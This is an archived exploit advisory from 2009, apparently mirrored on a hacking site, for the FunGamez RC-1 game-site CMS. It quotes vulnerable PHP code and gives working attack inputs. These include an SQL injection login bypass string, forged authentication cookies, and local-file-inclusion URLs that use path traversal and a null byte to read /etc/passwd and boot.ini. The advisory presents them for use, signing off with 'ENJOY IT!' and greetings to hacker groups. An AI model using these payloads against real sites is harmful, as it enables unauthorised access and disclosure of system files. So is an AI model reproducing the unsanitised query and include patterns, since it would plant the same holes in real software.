AOH :: HP Unsorted M :: VA3231.HTM

Multiple Remote Vulnerabilities--SQLi-(INSECURE-COOKIE-HANDLING)-LFI-->



Multiple Remote Vulnerabilities--SQLi-(INSECURE-COOKIE-HANDLING)-LFI-->
Multiple Remote Vulnerabilities--SQLi-(INSECURE-COOKIE-HANDLING)-LFI-->



----------------------------------------------------------------------=0D
MULTIPLE REMOTE VULNERABILITIES	FunGamez-release candidate 1=0D
----------------------------------------------------------------------=0D
	=0D
   CMS INFORMATION:=0D
=0D
-->WEB: http://sourceforge.net/projects/fg-gsm/=0D 
-->DOWNLOAD: http://sourceforge.net/projects/fg-gsm/=0D 
-->DEMO: N/A=0D
-->CATEGORY: CMS / Portals=0D
-->DESCRIPTION: A game-site manager with fully customisable design, and easy game adding=0D
 		and I will build in more options to make the site fully customisable...=0D
=0D
  CMS VULNERABILITY:=0D
=0D
-->TESTED ON: firefox 3=0D
-->DORK: N/A=0D
-->CATEGORY: AUTH BYPASS/LFI=0D
-->AFFECT VERSION:RC-1=0D
-->Discovered Bug date: 2009-04-20=0D
-->Reported Bug date: 2009-04-20=0D
-->Fixed bug date: Not fixed=0D
-->Info patch: Not fixed=0D
-->Author: YEnH4ckEr=0D
-->mail: y3nh4ck3r[at]gmail[dot]com=0D
-->WEB/BLOG: N/A=0D
-->COMMENT: A mi novia Marijose...hermano,cu=F1ada, padres (y amigos xD) por su apoyo.=0D
=0D
/////////////////////////////=0D
=0D
AUTH BYPASS (LOGIN FORM)=0D
=0D
/////////////////////////////=0D
=0D
-----------=0D
BUG FILES:=0D
-----------=0D
=0D
Path --> [HOME_PATH]/pages/login.php=0D
=0D
It contents:=0D
=0D
...=0D
=0D
	$logindat = mysql_query("SELECT * FROM `fg_users` WHERE `username` = '".$uname."' and `password` = '".$upass."'");=0D
=0D
...=0D
=0D
---------=0D
EXPLOIT:=0D
---------=0D
=0D
PEPE' OR 1=1 /*=0D
=0D
Password:ANY=0D
=0D
=0D
////////////////////////////////////////=0D
=0D
AUTH BYPASS (INSECURE COOKIE HANDLING)=0D
=0D
////////////////////////////////////////=0D
=0D
-----------=0D
BUG FILES:=0D
-----------=0D
=0D
Path --> [HOME_PATH]/includes/user.php=0D
=0D
It contents:=0D
=0D
...=0D
=0D
function checklogin(){=0D
=0D
	If ( $_SESSION['user'] == null )  {=0D
=0D
		If ( $_COOKIE['user'] == null )   {          =0D
 			return 0;       =0D
 		}         =0D
		Else        =0D
		{           =0D
			return $_COOKIE['user'];         =0D
		}     =0D
	}  =0D
 	Else      =0D
	{        =0D
	return $_SESSION['user'];      =0D
	}=0D
}=0D
=0D
...=0D
=0D
Path --> [HOME_PATH]/index.php=0D
=0D
It contents:=0D
=0D
...=0D
=0D
If ( $page->requireslogin($name) && !$user->checklogin() ) { $name = 'login'; $_GET['newlogin'] = 1; }=0D
=0D
...=0D
=0D
----------=0D
EXPLOITS:=0D
----------=0D
=0D
Add cookie:=0D
=0D
1)user=1 path=/	(Insecure cookie)=0D
=0D
2)user=pepe' or 1=1 /* path=/ (SQL injection)=0D
=0D
=0D
=0D
=0D
///////////////////////////////=0D
=0D
LOCAL FILE INCLUSION (LFI)=0D
=0D
///////////////////////////////=0D
=0D
------------=0D
CONDITIONS:=0D
------------=0D
=0D
Need: Be admin user (above! :P)=0D
=0D
-----------=0D
BUG FILES:=0D
-----------=0D
=0D
Path --> [HOME_PATH]/admin/load.php=0D
=0D
It contents:=0D
=0D
...=0D
=0D
If ( !isset($_GET['module']) ) $mod = 'start';=0D
=0D
If ( isset($_GET['module']) ) $mod = $_GET['module'];=0D
=0D
include('./admin/modules/'.$mod.'.php');=0D
=0D
----------=0D
EXPLOITS:=0D
----------=0D
=0D
1)http://[HOST]/FunGamez/index.php?admin&module=../../../../../../boot.ini%00=0D 
=0D
2)http://[HOST]/FunGamez/index.php?admin&module=../../../../../etc/passwd%00=0D 
=0D
=0D
*******************************************************************=0D
 ESPECIAL THANKS TO: JosS and every H4ck3r(all who do hack0wn)!=0D
*******************************************************************=0D
-------------------------------------------------------------------=0D
*******************************************************************=0D
 GREETZ TO: Str0ke and all spanish Hack3Rs community!=0D
*******************************************************************=0D
=0D
-------------------EOF---------------------------------->>>ENJOY IT!

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.